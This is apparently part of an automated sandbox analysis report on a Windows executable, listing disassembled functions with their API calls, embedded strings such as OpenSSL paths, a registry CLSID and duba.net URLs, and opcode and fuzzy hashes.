                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prologInitialize__vsnprintf_memset
                                                                                                                                                • String ID: NOMAINBOARD$|P
                                                                                                                                                • API String ID: 3286766113-690647166
                                                                                                                                                • Opcode ID: d04c3f917532c31ad57bfdc795bdffd86bb996709b5d9ddfffea2eaf32ed03b4
                                                                                                                                                • Instruction ID: 3dea86458b475e9be6c17872ade8ca7c85ef07eecdb0441fc02be559fec13cce
                                                                                                                                                • Opcode Fuzzy Hash: d04c3f917532c31ad57bfdc795bdffd86bb996709b5d9ddfffea2eaf32ed03b4
                                                                                                                                                • Instruction Fuzzy Hash: 17117F72C0011CAADB10EF98C942AEEBBB8EF04315F10806BF504B3181D7745F848BA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041C92E
                                                                                                                                                • _memset.LIBCMT ref: 0041C972
                                                                                                                                                  • Part of subcall function 0041462E: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,0041C8BA,00000002,?,?), ref: 0041464C
                                                                                                                                                  • Part of subcall function 0040D892: __vsnprintf.LIBCMT ref: 0040D8C9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prologInitialize__vsnprintf_memset
                                                                                                                                                • String ID: NOMAC$|P
                                                                                                                                                • API String ID: 3286766113-3842028867
                                                                                                                                                • Opcode ID: 41e4ccd1a1d3e3945413a077e9dcb5b43cfd0b180a7dedb00d28ca424f4d14d7
                                                                                                                                                • Instruction ID: 0254dd10d9319b635210cbb36955b97ea6cdc3ccd2d5418d5c834c71337a82de
                                                                                                                                                • Opcode Fuzzy Hash: 41e4ccd1a1d3e3945413a077e9dcb5b43cfd0b180a7dedb00d28ca424f4d14d7
                                                                                                                                                • Instruction Fuzzy Hash: EE114F72C1011CAADB10EF99C942AEEBBB8EF04354F10806BF505B7141D7755F848BE9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _strncmp
• String ID: I32$I64
• API String ID: 909875538-3980630743
• Opcode ID: d695a363466a1d65280b908a4f4a573f1b93cc1d52d13fe47bbdf8f493443296
• Instruction ID: fbf101eb32de22f739eef61a1eee25d26b9e25d49b1fc3c4ebcb3ea462e8c847
• Opcode Fuzzy Hash: d695a363466a1d65280b908a4f4a573f1b93cc1d52d13fe47bbdf8f493443296
• Instruction Fuzzy Hash: 45F0F455A4D68910EE3E102A9ADAEEF05485ADB741B380CE7F980D4792E54DCEC270BF
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast__fprintf_l_strlen
• String ID: %d.%d.%d.%d
• API String ID: 1842623586-3491811756
• Opcode ID: 439c48a0b2940fa3fae91602a149398ce2a8b9a039d42003f39244e267658133
• Instruction ID: d65ba8b59bb47cd9bcc4a2c99a98e0caa070d0074dd6de702663d030502f2c7a
• Opcode Fuzzy Hash: 439c48a0b2940fa3fae91602a149398ce2a8b9a039d42003f39244e267658133
• Instruction Fuzzy Hash: 3201D4B05081486EDB05EBB58856EBE7BEC5B0C300F1404AAF445D7182DA28EA05C739
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00419047
• __time64.LIBCMT ref: 00419067
  • Part of subcall function 0049301E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0041906C,00000000,?,00418FBD,?), ref: 00493027
  • Part of subcall function 00405E8C: __vsnprintf.LIBCMT ref: 00405EC3
  • Part of subcall function 00418C80: __EH_prolog.LIBCMT ref: 00418C85
Strings
• |P, xrefs: 00419053
• http://config.i.duba.net/lminstall/%d.json?time=%d, xrefs: 00419075
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: H_prologTime$FileSystem__time64__vsnprintf
• String ID: http://config.i.duba.net/lminstall/%d.json?time=%d$|P
• API String ID: 747823519-2314358436
• Opcode ID: 82425741aaa83269e96d89c4b3425af64f37b72c2b651b8563bc1ab8e4abc535
• Instruction ID: 6f798bab8ae5fce17c8b5bb71087136a2511d4360da7ea0921b5c38b21a9b06e
• Opcode Fuzzy Hash: 82425741aaa83269e96d89c4b3425af64f37b72c2b651b8563bc1ab8e4abc535
• Instruction Fuzzy Hash: A3014471550105ABD700EB55CD46FAFBBE8FB08309F10442EE51997182E739A940CA59
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegCloseKey.ADVAPI32(00000000,00000000,0041C445,00000001,00000001,?,00000000,?,?,00404886,00000000,?,?,?,0040476B,00000001), ref: 0041C2FB
• RegOpenKeyW.ADVAPI32(80000000,CLSID\{79B5BC47-CEA1-4772-B433-7D1B3139F278}\Implemented Categories\{607568DD-B059-434b-B7E7-38EC51998F8E},00000000), ref: 0041C314
• RegCreateKeyExW.ADVAPI32(80000000,CLSID\{79B5BC47-CEA1-4772-B433-7D1B3139F278}\Implemented Categories\{607568DD-B059-434b-B7E7-38EC51998F8E},00000000,00000000,00000000,000F003F,00000000,00000000,00000000,00000000,0041C445,00000001,00000001,?,00000000), ref: 0041C331
Strings
• CLSID\{79B5BC47-CEA1-4772-B433-7D1B3139F278}\Implemented Categories\{607568DD-B059-434b-B7E7-38EC51998F8E}, xrefs: 0041C30A, 0041C327
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: CloseCreateOpen
• String ID: CLSID\{79B5BC47-CEA1-4772-B433-7D1B3139F278}\Implemented Categories\{607568DD-B059-434b-B7E7-38EC51998F8E}
• API String ID: 199004384-3881648003
• Opcode ID: 35701c2b3cff6324979daed04b98f46f3798106812daa40e16a3bd08cf5ae65e
• Instruction ID: 43416a5f2801b8c1b9ca87133f431386bbe06f5672876b3105eb32ea6ded1d3e
• Opcode Fuzzy Hash: 35701c2b3cff6324979daed04b98f46f3798106812daa40e16a3bd08cf5ae65e
• Instruction Fuzzy Hash: 72E06531244144B6C3715A175C8CF77BDBADBD2B92F30841AF554E1014C6258481D538
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0041726E
• _memset.LIBCMT ref: 00417293
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 004172B9
• RegCloseKey.ADVAPI32(?), ref: 0041732D
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: CloseOpenQueryValue_memset
• String ID:
• API String ID: 3211720786-0
• Opcode ID: 843ec2bddce7d0896e468d598c32151fc12be32df5fcc86b01e90207033c395a
• Instruction ID: 6e4429810f3c0363dc630099204bd45ef96597f3fca8856385bffe047aff788f
• Opcode Fuzzy Hash: 843ec2bddce7d0896e468d598c32151fc12be32df5fcc86b01e90207033c395a
• Instruction Fuzzy Hash: 99316971804208ABCB21DF65CC849EF77B8FB54314F10866BFD2686280E3799A84DB59
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _strlen$_strncmp
• String ID:
• API String ID: 3685948395-0
• Opcode ID: 1258f6bbc545bf7a21c4f9c19428a7d2e21b4cf6915dd9860b03d7470dc9105b
• Instruction ID: bd637bbff564bcfe619479290fe5df5877e38458aef28778ef1251de2467bede
• Opcode Fuzzy Hash: 1258f6bbc545bf7a21c4f9c19428a7d2e21b4cf6915dd9860b03d7470dc9105b
• Instruction Fuzzy Hash: 13115B372092636AEB1526366C046AF2BD58FC13E5B19083BFC00C2253EB2C8906627D
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,?,0049AFCE,?,0048EA8B,00000000,0048EB0C,?,00000000,?), ref: 0049AF53
  • Part of subcall function 0049AE0A: TlsGetValue.KERNEL32(?,0049AF66), ref: 0049AE11
  • Part of subcall function 0049AE0A: TlsSetValue.KERNEL32(00000000), ref: 0049AE32
• __calloc_crt.LIBCMT ref: 0049AF75
  • Part of subcall function 00499503: __calloc_impl.LIBCMT ref: 00499511
  • Part of subcall function 00499503: Sleep.KERNEL32(00000000,0049AF7A,00000001,00000214), ref: 00499528
  • Part of subcall function 0049AD78: TlsGetValue.KERNEL32(00000000,0049AE28), ref: 0049AD85
  • Part of subcall function 0049AD78: TlsGetValue.KERNEL32(FFFFFFFF), ref: 0049AD9C
  • Part of subcall function 0049AE92: GetModuleHandleA.KERNEL32(KERNEL32.DLL,005002D8,0000000C,0049AFA3,00000000,00000000), ref: 0049AEA3
  • Part of subcall function 0049AE92: GetProcAddress.KERNEL32(?,EncodePointer), ref: 0049AED7
  • Part of subcall function 0049AE92: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0049AEE7
  • Part of subcall function 0049AE92: InterlockedIncrement.KERNEL32(0050A468), ref: 0049AF09
  • Part of subcall function 0049AE92: __lock.LIBCMT ref: 0049AF11
  • Part of subcall function 0049AE92: ___addlocaleref.LIBCMT ref: 0049AF30
• GetCurrentThreadId.KERNEL32 ref: 0049AFA5
• SetLastError.KERNEL32(00000000), ref: 0049AFBD
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1081334783-0
                                                                                                                                                • Opcode ID: 06f9d05dd9366079797bbb28bca3016d1ad8db7ac674bda643109f731e3d459d
                                                                                                                                                • Instruction ID: e14dde214e7d1dd9dd8150a679745935fcab8354e7e8ecb1a83497280c6e238e
                                                                                                                                                • Opcode Fuzzy Hash: 06f9d05dd9366079797bbb28bca3016d1ad8db7ac674bda643109f731e3d459d
                                                                                                                                                • Instruction Fuzzy Hash: 93F022325087216ACE363B797C0AA5FAF648F44770B12823FF809961A2DF69CC1546DA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset
                                                                                                                                                • String ID: .\crypto\pkcs12\p12_key.c
                                                                                                                                                • API String ID: 2102423945-3219245189
                                                                                                                                                • Opcode ID: 1fbe4be08749f425d16b183333dfd850bf33008b0a0aeea2042ec7d926ae830a
                                                                                                                                                • Instruction ID: 67fa596e652a026b5efbde52e7c42b57ea35f7a2770410586bfd2b0620cef111
                                                                                                                                                • Opcode Fuzzy Hash: 1fbe4be08749f425d16b183333dfd850bf33008b0a0aeea2042ec7d926ae830a
                                                                                                                                                • Instruction Fuzzy Hash: CCC10CB16047006BC710DF65DC81B6F77EAAFC5748F05891FF98897342EA39D90487A6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _strncpy.LIBCMT ref: 0044D17D
                                                                                                                                                  • Part of subcall function 0042CAF0: _memset.LIBCMT ref: 0042CB12
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset_strncpy
                                                                                                                                                • String ID: .\crypto\x509\x509_obj.c$NO X509_NAME
                                                                                                                                                • API String ID: 3140232205-14672339
                                                                                                                                                • Opcode ID: 124068d156be6eb682a7a1a6bb890cfc9145f1f1c1789475fd1a828e4604f3a8
                                                                                                                                                • Instruction ID: fce4b375438f41594ab24ccddd121e58e631aa0083aaef6c31ba5b9e2fd4f3e9
                                                                                                                                                • Opcode Fuzzy Hash: 124068d156be6eb682a7a1a6bb890cfc9145f1f1c1789475fd1a828e4604f3a8
                                                                                                                                                • Instruction Fuzzy Hash: 58A1E271E083418BE720DF29D84171BB7E5BF94308F18496EE88997342E779E905CB97
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset
                                                                                                                                                • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                                                • API String ID: 2102423945-2878120539
                                                                                                                                                • Opcode ID: 274cc3cec98dade0b8a18d1637f7e57cf73f8184449d0baa31373715cbb90415
                                                                                                                                                • Instruction ID: 41cd6b4a0e75cd84360209415edd10210f52376397b4973a6a2576b074fc2507
                                                                                                                                                • Opcode Fuzzy Hash: 274cc3cec98dade0b8a18d1637f7e57cf73f8184449d0baa31373715cbb90415
                                                                                                                                                • Instruction Fuzzy Hash: 18512B717403083AE6346E96ACE3F3BBB58DB45758F242A1FF41585282E6ADF844C17E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • j <= (int)sizeof(ctx->key), xrefs: 00476567
                                                                                                                                                • .\crypto\hmac\hmac.c, xrefs: 0047656E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset
                                                                                                                                                • String ID: .\crypto\hmac\hmac.c$j <= (int)sizeof(ctx->key)
                                                                                                                                                • API String ID: 2102423945-2480544988
                                                                                                                                                • Opcode ID: 6a4a35478a830cd6fdfe555a345e2ae0ca57308bbe9bd65133bea76b1f46031a
                                                                                                                                                • Instruction ID: fe982ce8b675ab681baa0e897301a60f5d1ca34cf3b83c4e2e7befe5e1d37f79
                                                                                                                                                • Opcode Fuzzy Hash: 6a4a35478a830cd6fdfe555a345e2ae0ca57308bbe9bd65133bea76b1f46031a
                                                                                                                                                • Instruction Fuzzy Hash: 6E51EB725047415FE7309F65DC41BEB73DDAF84308F85882EE98EC2246EA3DE509876A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog
                                                                                                                                                • String ID: |P
                                                                                                                                                • API String ID: 3519838083-2149487505
                                                                                                                                                • Opcode ID: f1e2bc6188ce368f40754efe1280cb8a9c1834f72d5d9589bc8813c669dc4121
                                                                                                                                                • Instruction ID: 1844814f9872ecb2d22d8e83c5b33c559653adeb63becc75852703834bf69390
                                                                                                                                                • Opcode Fuzzy Hash: f1e2bc6188ce368f40754efe1280cb8a9c1834f72d5d9589bc8813c669dc4121
                                                                                                                                                • Instruction Fuzzy Hash: 80519031B00205DBDB10AFA9C98176EB7A4EF54314F10413FE916FB2C2DB78E9058B9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: __aulldvrm
• String ID: 0123456789ABCDEF$0123456789abcdef
• API String ID: 1302938615-885041942
• Opcode ID: 6be466fb5f1426b9d147384f146db8f68872330e33fa70f6d01d7265e7d622cf
• Instruction ID: befaf81086d876b6c289593e8dc0a7e9df569b76d527025ff23e0cad4f2ee8df
• Opcode Fuzzy Hash: 6be466fb5f1426b9d147384f146db8f68872330e33fa70f6d01d7265e7d622cf
• Instruction Fuzzy Hash: 8151707570C3618BCB14DE29E85062FB7E1AFC8308F48496EF984A7341D739DD198B96
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0040F16D
  • Part of subcall function 0040F707: __EH_prolog.LIBCMT ref: 0040F70C
  • Part of subcall function 0040394C: __EH_prolog.LIBCMT ref: 00403951
  • Part of subcall function 00405CD7: __EH_prolog.LIBCMT ref: 00405CDC
  • Part of subcall function 0048E466: __lock.LIBCMT ref: 0048E484
  • Part of subcall function 0048E466: ___sbh_find_block.LIBCMT ref: 0048E48F
  • Part of subcall function 0048E466: ___sbh_free_block.LIBCMT ref: 0048E49E
  • Part of subcall function 0048E466: HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
  • Part of subcall function 0048E466: GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
  • Part of subcall function 0040F754: __EH_prolog.LIBCMT ref: 0040F759
  • Part of subcall function 00409FC0: char_traits.LIBCPMT ref: 00409FE5
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: H_prolog$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lockchar_traits
• String ID: http://infoc0.duba.net/c/$|P
• API String ID: 3616838692-2502499865
• Opcode ID: 6191e8f9251e2a0a9c64d91dcb2595069eb88c985621122c477d2d9aef6a1c36
• Instruction ID: b98d6fad1df80a8023ba06de0c7f2d13ed45791516b7374b93f17bbeecd2c088
• Opcode Fuzzy Hash: 6191e8f9251e2a0a9c64d91dcb2595069eb88c985621122c477d2d9aef6a1c36
• Instruction Fuzzy Hash: 77513071C00208EBDF20EBD4C945BEEBBB8AF04318F54447AE515B72D2D779AA48CB65
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _strlen
• String ID: Set-Cookie:$none
• API String ID: 4218353326-3629594122
